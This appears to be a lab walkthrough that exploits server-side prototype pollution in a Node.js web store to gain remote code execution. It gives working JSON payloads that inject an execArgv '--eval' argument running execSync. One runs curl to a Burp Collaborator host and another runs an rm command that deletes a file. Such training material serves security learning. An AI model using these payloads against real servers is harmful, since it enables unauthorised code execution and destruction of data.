Lab: Remote code execution via server-side prototype pollution
Study the address change feature
After starting the exercise, the store should be similar to the one in the illustration.

First we log in to the store with the lab credentials wiener:peter. To do this, we click the My account link and fill out the login form.


After logging in, we have access to our billing and delivery address. Here we change the content of the Line 1 text field from Vienna HQ to Hacker and Victim Inc. and click the Submit button to send the form.

In the next step, we switch to the Burp Proxy and open the HTTP history there. In the HTTP history we search for the request POST /my-account/change-address.

We see that when the form is submitted, the field values are sent to the server as JSON, and the server responds with a JSON object representing our user. We send this request to Burp Repeater with the key combination CTRL+R.
Identify a prototype pollution source
In Repeater, we add a new property called __proto__ to the JSON, containing an object with a json spaces property. json spaces is the Express setting that controls the indentation of JSON responses, so if the server copies our object into Object.prototype, the effect shows up in the response without changing any application data. That makes it a safe, non-destructive probe.

"__proto__": {
  "json spaces": 10
}

The JSON in the request should look similar to the following code snippet.
{
  "address_line_1":"Hacker and Victim Inc.",
  "address_line_2":"One Wiener Way",
  "city":"Wienerville",
  "postcode":"BU1 1RP",
  "country":"UK",
  "sessionId":"5u6zXZqYKBhoJw57zCxYEyqChEmA9zms",
  "__proto__": {
    "json spaces":10
  }
}

After sending, we see in the Response section that our json spaces property now appears in the returned user object (line 11), although it was never one of our own fields: the server has merged the contents of our __proto__ object. A change in the indentation of the response is the other sign to look for, since that is what the json spaces setting controls. Our prototype pollution attempt was therefore successful.
{
  "username": "wiener",
  "firstname": "Peter",
  "lastname": "Wiener",
  "address_line_1": "Hacker and Victim Inc.",
  "address_line_2": "One Wiener Way",
  "city": "Wienerville",
  "postcode": "BU1 1RP",
  "country": "UK",
  "isAdmin": true,
  "json spaces": 10
}

Probe for remote code execution
In our browser we see a link with the name Admin panel.

When we open this link, we are taken to a page where there is a button called Run maintenance jobs.

If we click on this button, we receive the following information.

The button evidently starts some jobs on the backend. In Node.js, work like this is typically run in child processes created with child_process.fork() (or by spawning the node binary directly). fork() accepts an execArgv option, the list of arguments passed to the node executable itself, and when the caller's options object does not set it, the lookup falls through to the prototype chain, so a polluted execArgv reaches every child process the server creates. We therefore pollute the prototype with a malicious execArgv property that adds a --eval argument to each child process, and use that argument to call the execSync() sink with a command that triggers an interaction with the public Burp Collaborator server. Back in Burp Repeater, we add the following property to our JSON.
"__proto__": {
  "execArgv":[
    "--eval=require('child_process').execSync('curl https://YOUR-COLLABORATOR-ID.oastify.com')"
  ]
}

Make sure that you enter your own Collaborator ID. To get it, open the Collaborator tab and click the Copy to clipboard button.

The complete JSON in our request should now look like this:
{
  "address_line_1":"Hacker and Victim Inc.",
  "address_line_2":"One Wiener Way",
  "city":"Wienerville",
  "postcode":"BU1 1RP",
  "country":"UK",
  "sessionId":"T7yiqu3F2aJCjXMd1Jiktp38lKxGn5qJ",
  "__proto__": {
    "execArgv":[
      "--eval=require('child_process').execSync('curl https://p0qxf36szaiz86p7xb3dit41tszjn9by.oastify.com')"
    ]
  }
}

We now send the request and switch back to the browser. When we click the Run maintenance jobs button again, the jobs fail: each child process now executes our --eval payload instead of its job script.

Now we open Burp Collaborator and see that we have received four DNS and two HTTP interactions. The HTTP requests come from curl running on the server and confirm that our payload was executed, i.e. we have remote code execution; the DNS lookups are curl resolving the Collaborator hostname before each request.

Craft an exploit
In our request, we change the command inside our execArgv property from the curl call to rm /home/carlos/morale.txt. Our request now looks like this (line 10 contains the rm command):

{
  "address_line_1":"Hacker and Victim Inc.",
  "address_line_2":"One Wiener Way",
  "city":"Wienerville",
  "postcode":"BU1 1RP",
  "country":"UK",
  "sessionId":"T7yiqu3F2aJCjXMd1Jiktp38lKxGn5qJ",
  "__proto__": {
    "execArgv":[
      "--eval=require('child_process').execSync('rm /home/carlos/morale.txt')"
    ]
  }
}

We send the request, switch to the Admin panel in the browser, refresh the page and press the Run maintenance jobs button again. The maintenance job now runs our command and deletes /home/carlos/morale.txt, which completes the exercise.
